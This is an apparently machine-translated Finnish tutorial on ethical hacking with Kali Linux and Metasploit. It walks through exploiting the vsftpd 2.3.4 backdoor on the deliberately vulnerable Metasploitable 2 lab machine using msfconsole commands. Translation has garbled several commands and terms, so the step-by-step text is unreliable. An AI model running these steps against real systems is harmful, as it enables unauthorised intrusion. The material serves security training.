Metasploit Kali Linuxissa 2020

Metasploit Kali Linux 2020



Tunkeutumistestaus Kali Linuxilla


Internet on täynnä uhkailijoita, joilla on haitallisia aikomuksia ja jotka haluavat käyttää verkkoja ja hyödyntää tietojaan kiertäen havaitsemista. On järkevää varmistaa verkon turvallisuus vain mittaamalla niiden haavoittuvuudet. Läpäisykokeet tai eettinen hakkerointi on tapa, jolla testataan verkkoja tai palvelimia raskaana olevien kohteiden varalta määrittämällä kaikki mahdolliset rikkomukset, joita hakkeri saattaa käyttää pääsyn saamiseksi, mikä vähentää tietoturvakompromisseja. Tunkeutumistestaus suoritetaan usein ohjelmistosovellusten kautta, joista suosituin on Kali Linux, mieluiten Metasploit -kehyksen kanssa. Pysy loppuun asti oppiaksesi testaamaan järjestelmää suorittamalla hyökkäys Kali Linuxilla.

Johdanto Kali Linux- ja Metasploit -kehyksiin

Kali Linux on yksi monista kehittyneistä järjestelmän suojaustyökaluista, jotka Offensive Security on kehittänyt (ja päivittänyt säännöllisesti). Se on Linux -pohjainen käyttöjärjestelmä, joka sisältää joukon työkaluja, jotka on suunniteltu pääasiassa tunkeutumistestaukseen. Se on melko helppokäyttöinen (ainakin verrattuna muihin kynätestausohjelmiin) ja riittävän monimutkainen, jotta saadaan riittävät tulokset.







The Metasploit Framework on avoimen lähdekoodin modulaarinen tunkeutumisen testausalusta, jota käytetään hyökkäämään järjestelmiin tietoturvahyökkäysten testaamiseksi. Se on yksi yleisimmin käytetyistä tunkeutumistestityökaluista ja se on sisäänrakennettu Kali Linuxiin.



Metasploit koostuu tietokannasta ja moduuleista. Datamuistin avulla käyttäjä voi määrittää kehyksen näkökohdat, kun taas moduulit ovat itsenäisiä koodinpätkiä, joista Metasploit saa ominaisuudet. Koska keskitymme hyökkäyksen suorittamiseen kynätestausta varten, pidämme keskustelun moduuleina.



Yhteensä on viisi moduulia:





Käyttää hyväkseen - välttää havaitsemisen, murtautuu järjestelmään ja lataa hyötykuormamoduulin
Hyötykuorma - Sallii käyttäjän pääsyn järjestelmään
Apulaite - tukee rikkomusta suorittamalla tehtäviä, jotka eivät liity hyväksikäyttöön
Lähettää - Operaatio - mahdollistaa lisäpääsyn jo vaarantuneeseen järjestelmään
EI generaattori - käytetään suojaus -IP -osoitteiden ohittamiseen

Käytämme Exploit- ja hyötykuormamoduuleja päästäksemme kohdejärjestelmäämme.



Kynätestauslaboratorion perustaminen

Tarvitsemme seuraavan ohjelmiston:

Kali Linux:

Kali Linuxia käytetään paikallisesta laitteistostamme. Käytämme sen Metasploit -kehystä hyväksikäytön paikantamiseen.

Hypervisori:

Tarvitsemme hypervisorin, koska sen avulla voimme luoda virtuaalikone , jonka avulla voimme työskennellä useamman kuin yhden käyttöjärjestelmän kanssa samanaikaisesti. Se on tunkeutumistestin olennainen edellytys. Sujuvaa purjehdusta ja parempia tuloksia varten suosittelemme käyttämään jompaakumpaa Virtualbox tai Microsoft Hyper-V virtuaalikoneen luomiseksi .

Metasploitable 2

Ei pidä sekoittaa Metasploitiin, joka on Kali Linuxin kehys, metasploitable on tarkoituksellisesti haavoittuva virtuaalikone, joka on ohjelmoitu kouluttamaan kyberturvallisuuden ammattilaisia. Metasploitable 2: ssa on tonnia tunnettuja testattavia haavoittuvuuksia, joita voimme hyödyntää, ja verkossa on tarpeeksi tietoa, joka auttaa meitä pääsemään alkuun.

Vaikka Metasploitable 2: n virtuaalijärjestelmän kimppuun hyökkääminen on helppoa, koska sen haavoittuvuudet on dokumentoitu hyvin, tarvitset paljon enemmän asiantuntemusta ja kärsivällisyyttä todellisten koneiden ja verkkojen suhteen. Mutta metasploitable 2: n käyttäminen kynätestissä toimii erinomaisena lähtökohtana oppia menetelmästä.

Käytämme metasploitable 2: ta kynätestauksen jatkamiseen. Et tarvitse paljon tietokoneen muistia tämän virtuaalikoneen toimimiseksi, 10 Gt: n kiintolevytila ​​ja 512 Mt RAM -muistia toimivat hyvin. Muista vain muuttaa Metasploitable-verkkoasetukset isäntäsovittimeksi asennuksen aikana. Kun olet asentanut, käynnistä Metasploitable ja kirjaudu sisään. Käynnistä Kali Linux, jotta voimme saada sen Metasploit -kehyksen toimimaan testauksen aloittamiseksi.

VSFTPD v2.3.4 Backdoor -komentojen suorittamisen hyödyntäminen

Kun kaikki asiat ovat paikoillaan, voimme vihdoin etsiä haavoittuvuuden, jota voidaan hyödyntää. Voit etsiä verkosta erilaisia ​​haavoittuvuuksia, mutta tässä opetusohjelmassa näemme kuinka VSFTPD v2.3.4 voidaan hyödyntää. VSFTPD tarkoittaa erittäin turvallista FTP -demonia. Olemme valinneet tämän, koska se antaa meille täyden pääsyn Metasploitable-käyttöliittymään ilman lupaa.

Käynnistä Metasploit -konsoli. Siirry Kali Linuxin komentoriville ja kirjoita seuraava koodi:

$sudomsfconsole

Kun konsoli on nyt avattu, kirjoita:

$haku vsftpd

Tämä tuo esiin haavoittuvuuden, jonka haluamme hyödyntää. Valitse se kirjoittamalla

$käyttää hyväksikäyttöä/unix/ftp/vsftpd_234_ takaovi

Näet, mitä lisätietoja tarvitaan hyväksikäytön käynnistämiseksi kirjoittamalla

$näytä vaihtoehdot

Ainoa olennaisesti tärkeä tieto puuttuu, on IP, jonka toimitamme.

Etsi IP -osoite metasploitavasta kirjoittamalla

$ifconfig

Komentokuoressaan

IP -osoite on toisen rivin alussa, jotain sellaista

#inet -osoite: 10.0.2.15

Kirjoita tämä komento ohjataksesi Metasploitin kohdejärjestelmään ja aloita hyväksikäyttö. Käytän ip: tä, mutta se johtaa virheeseen, mutta jos käytät toista uhrin IP -osoitetta, saat tuloksia hyväksikäytöstä

$asetaKUUNNELLA[uhrin IP]

$juosta

Nyt, kun Metasploitableille on myönnetty täydellinen käyttöoikeus, voimme navigoida järjestelmässä ilman rajoituksia. Voit ladata luokiteltuja tietoja tai poistaa palvelimelta kaiken tärkeän. Todellisissa tilanteissa, joissa blackhat saa pääsyn tällaiselle palvelimelle, he voivat jopa sammuttaa suorittimen ja aiheuttaa muiden siihen liitettyjen tietokoneiden kaatumisen.

Asioiden kääriminen

On parempi poistaa ongelmat etukäteen kuin reagoida niihin. Tunkeutumistestaus voi säästää paljon vaivaa ja tavoittamista, kun kyse on järjestelmien turvallisuudesta, olipa kyseessä sitten yksi tietokonelaite tai koko verkko. Tässä mielessä on hyödyllistä saada perustiedot kynätestauksesta. Metasploitable on erinomainen työkalu olennaisten asioiden oppimiseen, koska sen haavoittuvuudet tunnetaan hyvin, joten siitä on paljon tietoa. Olemme työskennelleet vain yhdessä hyödyntämisessä Kali Linuxin kanssa, mutta suosittelemme, että tutustut niihin tarkemmin.